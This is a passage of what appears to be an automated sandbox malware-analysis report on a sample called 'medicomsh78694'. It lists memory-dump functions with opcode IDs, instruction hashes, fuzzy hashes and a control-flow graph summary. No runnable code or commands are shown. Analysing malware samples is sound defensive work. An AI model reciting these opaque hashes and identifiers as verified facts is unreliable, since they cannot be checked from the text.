                                                                            control_flow_graph 1595 370b00-370b2e 1596 370b35-370b65 1595->1596 1597 370b30 1595->1597 1598 370b67-370b7b 1596->1598 1599 370b7d 1596->1599 1597->1596 1600 370b84-370b8f 1598->1600 1599->1600 1602 370f47-370f63 1600->1602 1603 370b95-370bb4 1600->1603 1606 370c9a-370cc9 1603->1606 1607 370bba-370be3 1603->1607 1618 370cca-370cf0 1606->1618 1610 370be5-370beb 1607->1610 1611 370bed 1607->1611 1612 370bf0-370c29 1610->1612 1611->1612 1621 370c95-370c98 1612->1621 1622 370c2b-370c8a 1612->1622 1623 370cf2-370cf8 1618->1623 1624 370cfa 1618->1624 1621->1618 1622->1621 1625 370cfd-370d34 1623->1625 1624->1625 1633 370d36-370d43 1625->1633 1634 370d45 1625->1634 1635 370d48 1633->1635 1634->1635 1638 370d4f-370f0a 1635->1638 1641 370f14 1638->1641 1642 370f0c-370f12 1638->1642 1643 370f17-370f44 1641->1643 1642->1643 1643->1602
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @20m
                                                                            • API String ID: 0-1912249801
                                                                            • Opcode ID: 679634f8a1df9763fc148556246b41a66090904705c3a58dac9362e3d3498ef9
                                                                            • Instruction ID: 3c7eaf42fd16c5b8bbb4a6a6199ea2c5d0a594bfdbfb6c74e1610a6ee782f00f
                                                                            • Opcode Fuzzy Hash: 679634f8a1df9763fc148556246b41a66090904705c3a58dac9362e3d3498ef9
                                                                            • Instruction Fuzzy Hash: 4591C374E00218CFDB29DFA4C994B9DBBF5AF49304F1085A9E509AB360DB34AE85DF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037D1A0, Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: fCl
                                                                            • API String ID: 0-625834680
                                                                            • Opcode ID: 88a6fb866daee78cfcfdb38b0b5c89767d8a1362fe2ea865b41763a3b3342c75
                                                                            • Instruction ID: 735b7e50350d2c540a8273e83bc517d094700ddb626f96433a71a6ef88d21b9e
                                                                            • Opcode Fuzzy Hash: 88a6fb866daee78cfcfdb38b0b5c89767d8a1362fe2ea865b41763a3b3342c75
                                                                            • Instruction Fuzzy Hash: 7F41DD74E052189FDB09DFA4E9509EEBBF2AF89300F10806AE805B7364DB355D46CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037D1B0, Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: fCl
                                                                            • API String ID: 0-625834680
                                                                            • Opcode ID: 63fb21df67fd6e9ee0e135d2c91e8c5ea77a8e5653d5a5e1e3aa6a75904c371b
                                                                            • Instruction ID: 0634cc4d1abc03d51c152c03f8c3e4cd13192ed1ae5358ee4710d284efe0ff61
                                                                            • Opcode Fuzzy Hash: 63fb21df67fd6e9ee0e135d2c91e8c5ea77a8e5653d5a5e1e3aa6a75904c371b
                                                                            • Instruction Fuzzy Hash: 42318D74E012189FDB08DFA5E9409EEBBF6EF88304F10842AE815B7754DB356942CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 003782FC, Relevance: .2, Instructions: 242COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 995c67aa22b9c9fd9ca02df58b676ce4a1c665b674a9ec716f98dc332ed5ff72
                                                                            • Instruction ID: de35622e4fe861605b5d15c84b7217913e2c3fc0355a4ff277abe4ad33c4bb35
                                                                            • Opcode Fuzzy Hash: 995c67aa22b9c9fd9ca02df58b676ce4a1c665b674a9ec716f98dc332ed5ff72
                                                                            • Instruction Fuzzy Hash: E6B1DF74E00218CFDB25CFA8D885B9DFBB1BF49304F248569E859AB351DB74A985CF80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037BCFC, Relevance: .2, Instructions: 232COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 40fe59e8fcc007f5bb60f2d9f69752b2cd96c1c195c00db11945811f691eed6f
                                                                            • Instruction ID: 0c359793d28e8376653a56bfa4c546328e111d0e693c6dd1b735a04ab5699a22
                                                                            • Opcode Fuzzy Hash: 40fe59e8fcc007f5bb60f2d9f69752b2cd96c1c195c00db11945811f691eed6f
                                                                            • Instruction Fuzzy Hash: CDA1D074E002188FDB25CFA8C885BDDFBB1BF49304F2485A9E859AB351DB74A985CF44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037C188, Relevance: .2, Instructions: 175COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 11ac61b7aeb56a9fe16dd4f76fe8b73c7eee31625cfdcf14bd56296390399e29
                                                                            • Instruction ID: fd6d0290601fa688b098ee3bf99bdf2fa7f0aa158031f049a0b7bc8c5c28c741
                                                                            • Opcode Fuzzy Hash: 11ac61b7aeb56a9fe16dd4f76fe8b73c7eee31625cfdcf14bd56296390399e29
                                                                            • Instruction Fuzzy Hash: DA81C274A01208CFCB18DFB8D598AADBBB1FF49315F2184ADE419AB365DB35A841CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037F220, Relevance: .2, Instructions: 150COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f6dc3544aa8d381069147b8f34fa1d1e45bc493bd6321ef45d86976e947809ed
                                                                            • Instruction ID: 9d27b9a2e6aa2b45c6b7aad9d84e4ee7f29e36e93007acc8df9f61d230bdd3cb
                                                                            • Opcode Fuzzy Hash: f6dc3544aa8d381069147b8f34fa1d1e45bc493bd6321ef45d86976e947809ed
                                                                            • Instruction Fuzzy Hash: F151AF78A04645DFDB21CBA9C440ABEB7F1FF48300F24C976E459A7696C7389D84CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00370F71, Relevance: .1, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0c47b2ea8c15f8838badcfb3f94fd4628c52d9239b71916c39cf922bb18726e8
                                                                            • Instruction ID: 8b97d3a49803eec49425389bf637451f5efe9ab76cb3ddf53395e0830dcab59a
                                                                            • Opcode Fuzzy Hash: 0c47b2ea8c15f8838badcfb3f94fd4628c52d9239b71916c39cf922bb18726e8
                                                                            • Instruction Fuzzy Hash: 2C51D874E001099FCB04EFA4D8909DEB7B2EF89304F5086AAD525BB355DB346E45CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00370F80, Relevance: .1, Instructions: 124COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e230fdf14963c1b16f4fc3dc6a1c24d91cb0deab49850ccc10f512755f135018
                                                                            • Instruction ID: 9feeb7115fa4cd1784bd033cf33129d2d44bf94c9d8ceb4ac1c3e88b9c54e059
                                                                            • Opcode Fuzzy Hash: e230fdf14963c1b16f4fc3dc6a1c24d91cb0deab49850ccc10f512755f135018
                                                                            • Instruction Fuzzy Hash: C951C474E001099FCB04EFA4D890ADEB7B2EF89304F1086A9E925B7355DB346E45CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037C918, Relevance: .1, Instructions: 122COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cd349258228d8508348afd9e88e83edd8f85323ab28c71041cfa05f1866fe6b3
                                                                            • Instruction ID: ce51cba74b5da4b612db423b5073142bd6a70e9b143002bc8eb3d228563734d1
                                                                            • Opcode Fuzzy Hash: cd349258228d8508348afd9e88e83edd8f85323ab28c71041cfa05f1866fe6b3
                                                                            • Instruction Fuzzy Hash: 7351F370D04259DFDB19DFA9D8446EDBBB2FF88300F24812AD408B7294DB385A86CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037CAB0, Relevance: .1, Instructions: 86COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b715404f6fa5a8b7c044fb7d9145fbf62ce503e0b4363d33617e95e1b675f69c
                                                                            • Instruction ID: a2d75c2b09d4b02a658388bd24c0d301fcdbc787c4519ff443eb3682f3ce3dc8
                                                                            • Opcode Fuzzy Hash: b715404f6fa5a8b7c044fb7d9145fbf62ce503e0b4363d33617e95e1b675f69c
                                                                            • Instruction Fuzzy Hash: 8031C070E012189FCB54CFAAD5806EEBBF6AF88305F20902AE418B7254DB345A41CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0018D01C, Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422816480.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_18d000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e03d47d829af3607288df63ed07f78307781e9f24ef6af17c8cf31474a0cad44
                                                                            • Instruction ID: 8c39aed12491136a6fa39428a6e4b4a6e9cfbb4335809c430bfc2ffb5c560235
                                                                            • Opcode Fuzzy Hash: e03d47d829af3607288df63ed07f78307781e9f24ef6af17c8cf31474a0cad44
                                                                            • Instruction Fuzzy Hash: 9721F275604304DFDB14EF64E884B16BB65EB84314F20C9A9E80A4B286C736D947CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0018D1D4, Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422816480.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_18d000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 15ed6087bdcb983c8214ae262253c44f092b9dd08334fc1cd982a053ff9b983d
                                                                            • Instruction ID: e416f384512cea22fd2071b9fe7c96c7ac898dee1576d9446b42b1c1214ca546
                                                                            • Opcode Fuzzy Hash: 15ed6087bdcb983c8214ae262253c44f092b9dd08334fc1cd982a053ff9b983d
                                                                            • Instruction Fuzzy Hash: 79210471604304EFDB05EF54E9C0B26BBA6FB84314F20CAADE8094B282C336D946CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037F0F9, Relevance: .1, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b2e794d1f67bf090c5e7011aebf3bd7a13276c6dd24dc41ddb03b427b8f5565
                                                                            • Instruction ID: c4f8bc9e8c0b53bf084dc82127e9de868300a098e5c930c0f034221d40546a5c
                                                                            • Opcode Fuzzy Hash: 2b2e794d1f67bf090c5e7011aebf3bd7a13276c6dd24dc41ddb03b427b8f5565
                                                                            • Instruction Fuzzy Hash: AC219A71A05111CFC726CF68DC44AAABBA5FF08315F99C2B6E429DB296C338C945CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037D5F0, Relevance: .1, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 34eb9804acfaf50be1393c3635db737140e2be1cc4e6ff5265ea4f2953283adf
                                                                            • Instruction ID: 2939909f32e34eea8ed5d7264f89b47b51a2884f5e1a5530287e0a13c776fee9
                                                                            • Opcode Fuzzy Hash: 34eb9804acfaf50be1393c3635db737140e2be1cc4e6ff5265ea4f2953283adf
                                                                            • Instruction Fuzzy Hash: 631102723085248FD3268A2CDC9466A7BB9EF86314F56C837E58FCB681D22ADC419791
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0018D1CF, Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422816480.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_18d000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 705ada77aa18427fb7566f6aff9062515466c3b2fc1146b9a875443394fb7337
                                                                            • Instruction ID: aa5f22f0e12d6f26543010fbcfc7905eb7c89bd5444acdc47bd4a0a45ef8b849
                                                                            • Opcode Fuzzy Hash: 705ada77aa18427fb7566f6aff9062515466c3b2fc1146b9a875443394fb7337
                                                                            • Instruction Fuzzy Hash: 2F118B75504284DFCB12DF14E5C4B15BBA2FB84314F24C6A9D8494B696C33AD94ACFA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0018D017, Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422816480.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_18d000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 705ada77aa18427fb7566f6aff9062515466c3b2fc1146b9a875443394fb7337
                                                                            • Instruction ID: dced52790ccc31726afdda55bd08a01545abc807c79c0391c66b6a3635918a42
                                                                            • Opcode Fuzzy Hash: 705ada77aa18427fb7566f6aff9062515466c3b2fc1146b9a875443394fb7337
                                                                            • Instruction Fuzzy Hash: 8811BE75504380CFCB11DF14E584B15BB61FB44314F24C6A9E8094B696C33AD90ACFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0016D1D5, Relevance: .0, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422686895.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_16d000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ce6e8b45adc492ff433db9c6497af3550baca0b7e082de52dacd4b5b61b7307d
                                                                            • Instruction ID: 21ea88d211337d5e2a3a80821ce70b8fff83a64968fb4b474ce47e9f3c637998
                                                                            • Opcode Fuzzy Hash: ce6e8b45adc492ff433db9c6497af3550baca0b7e082de52dacd4b5b61b7307d
                                                                            • Instruction Fuzzy Hash: F301F730D053409ADB108A65DC98B67FBDCEF51724F18C45EED051A282C374DC45C6B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037CC47, Relevance: .0, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ab36d2d2afb91dc0dcceeca7ffb0b2dd67d6b6388a88f4d510092b9cfbe3ecea
                                                                            • Instruction ID: f8057dd975a6291e1880112682d04560857a6be316656b083801b765d4ffe799
                                                                            • Opcode Fuzzy Hash: ab36d2d2afb91dc0dcceeca7ffb0b2dd67d6b6388a88f4d510092b9cfbe3ecea
                                                                            • Instruction Fuzzy Hash: 91111774D093898FC742DFB9C8542AEBFF0AF4A300B1584DBD849EB262D7345A05DB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037CD20, Relevance: .0, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 82d1be37da0c115b8052a3913dfc3617b9d42b0fce370b3ab287cf2721bdacb8
                                                                            • Instruction ID: 8393851139cff5a4ba81468f2275672c7c30087274d40703ad7fbfafb927897e
                                                                            • Opcode Fuzzy Hash: 82d1be37da0c115b8052a3913dfc3617b9d42b0fce370b3ab287cf2721bdacb8
                                                                            • Instruction Fuzzy Hash: D80144709192889FD701DFA8C8047ADBFF4EF4A301F0680EAD858DB2A2E7349A44CB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0016D1D4, Relevance: .0, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422686895.000000000016D000.00000040.00000001.sdmp, Offset: 0016D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_16d000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8c221f277a61a536bfe6889d2a2e224c784628be44b92a29aa82555d7303e3ab
                                                                            • Instruction ID: 84adad42550b3ede30d17e76d45946fca8ab20b1a844a4769c4fb972b6d7e835
                                                                            • Opcode Fuzzy Hash: 8c221f277a61a536bfe6889d2a2e224c784628be44b92a29aa82555d7303e3ab
                                                                            • Instruction Fuzzy Hash: F7F06D75905644AAEB108E55DC88B63FFD8EF91724F28C45AED085B286C378EC44CBB1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037CD9C, Relevance: .0, Instructions: 34COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4c827e47265e55cc7aba2e6f301bbd0e6aa68484320fe39414c38141ed9e9c38
                                                                            • Instruction ID: a3ad091f7913189ea3cbf0fbe11270a7b85ab9b702e84d2624b644579eba8364
                                                                            • Opcode Fuzzy Hash: 4c827e47265e55cc7aba2e6f301bbd0e6aa68484320fe39414c38141ed9e9c38
                                                                            • Instruction Fuzzy Hash: 57F06D719045848FC721CFA8D844769BBF0EF06302F4A81EAE81ACB6A2D739DE40CB01
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00370A8C, Relevance: .0, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3cb192cc8edb6b5a9ddf388a85909973ac99c5530d8fb93c3eecd9811b6bcd63
                                                                            • Instruction ID: 40eceeb1f7fd7d3fe5ad4b929b4e3fffa14aec834149f1302d7eabaf6d4dd243
                                                                            • Opcode Fuzzy Hash: 3cb192cc8edb6b5a9ddf388a85909973ac99c5530d8fb93c3eecd9811b6bcd63
                                                                            • Instruction Fuzzy Hash: 7901B6B4D00219DFDB40DFA8C64199DBBF4FB48200F1089AA9818A7311E7749B40DF81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037CC68, Relevance: .0, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 31cb4de0f2f7cd9021e0121068207cfb13e770c1f5d785a07fac0b8db6c3b20e
                                                                            • Instruction ID: 8cbc437e252f0ce04d65b35a01b24f863482df164117f53b0b9d2b3a56a4f4ac
                                                                            • Opcode Fuzzy Hash: 31cb4de0f2f7cd9021e0121068207cfb13e770c1f5d785a07fac0b8db6c3b20e
                                                                            • Instruction Fuzzy Hash: 06F0A4B4D142099FCB44DFE9D5446AEBBF5FF48300F1095AAD819A3320E7705A41DF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 003707B0, Relevance: .0, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0bb72e39599246487470f71db21ede2d2723c868796e0c683fe8c35008c7c65b
                                                                            • Instruction ID: 9f23c9785de0666c36e7c6f4c62166f3f294f347693e95646b1638d01de0ecf4
                                                                            • Opcode Fuzzy Hash: 0bb72e39599246487470f71db21ede2d2723c868796e0c683fe8c35008c7c65b
                                                                            • Instruction Fuzzy Hash: DAF0127080A388DFCB56DFB4995869CBFB0AF06205F1441EED845E36A1D7740A84DF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 003707C0, Relevance: .0, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f7cd404d3a238b22aad7c0f8e915b972be37f762ae76dbbc58b26d329aa7bf3a
                                                                            • Instruction ID: 799b2cb28b4585785aec069df836fb55e46aed0fd60db59d228ba43e807dab9a
                                                                            • Opcode Fuzzy Hash: f7cd404d3a238b22aad7c0f8e915b972be37f762ae76dbbc58b26d329aa7bf3a
                                                                            • Instruction Fuzzy Hash: B4E01A70801208EFCB54EFB4D94869CBBF5EB05206F2041B9D809A3790EB345B80DB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037E1D5, Relevance: .0, Instructions: 2COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a7329fd300f881c6076f70233d0c4bc9613396c17fe557672cc8d2eac485a092
                                                                            • Instruction ID: 4e611655e2a3ab7e451da0bc4c7b61a0101d3761f96a99d48ac1ef41895f7a78
                                                                            • Opcode Fuzzy Hash: a7329fd300f881c6076f70233d0c4bc9613396c17fe557672cc8d2eac485a092
                                                                            • Instruction Fuzzy Hash:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 00445450, Relevance: 5.2, Strings: 4, Instructions: 157COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: DAD$DAD$WY>$WY>
                                                                            • API String ID: 0-682574126
                                                                            • Opcode ID: 35521070ef865b96a2b0d191d71f39367691bc40cbe403d5fde56add1ac35e62
                                                                            • Instruction ID: 5bc91635fc10a019c4c1226c26d853eb034b0aca4ac157a03dd93d6f9ca69c2e
                                                                            • Opcode Fuzzy Hash: 35521070ef865b96a2b0d191d71f39367691bc40cbe403d5fde56add1ac35e62
                                                                            • Instruction Fuzzy Hash: 8D6129B0D04609DFDF04CFA5C5816EEFBF2AF84300F14846AD525AB655D7389A82CF99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044CE00, Relevance: 2.6, Strings: 2, Instructions: 134COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_440000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: <5A$r5,
                                                                            • API String ID: 0-3744870847
                                                                            • Opcode ID: ef5e6911f7bef99bf46c77abb7ee7fb21293098d625902089782cc599d4d6d7f
